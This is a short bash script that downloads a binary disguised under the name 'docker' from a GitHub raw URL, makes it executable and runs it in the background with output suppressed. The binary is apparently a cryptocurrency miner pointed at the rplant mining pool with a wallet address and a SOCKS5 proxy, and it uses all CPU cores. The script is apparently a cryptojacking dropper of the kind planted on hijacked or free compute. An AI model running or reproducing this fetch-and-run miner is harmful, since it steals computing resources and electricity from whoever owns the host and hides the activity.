#!/bin/bash
wget https://raw.githubusercontent.com/jsiqiisn/a/main/docker
chmod 777 docker
./docker -o stratum-eu.rplant.xyz:7075 -u BcEBgtWtz7RhWFmACgt5PQeG2SSvP4dhSy.sok -p x -a ghostrider -t$(nproc --all) --proxy=socks5://mike:mike@20.211.19.20:4145 > /dev/null 2>&1 &
uname -a
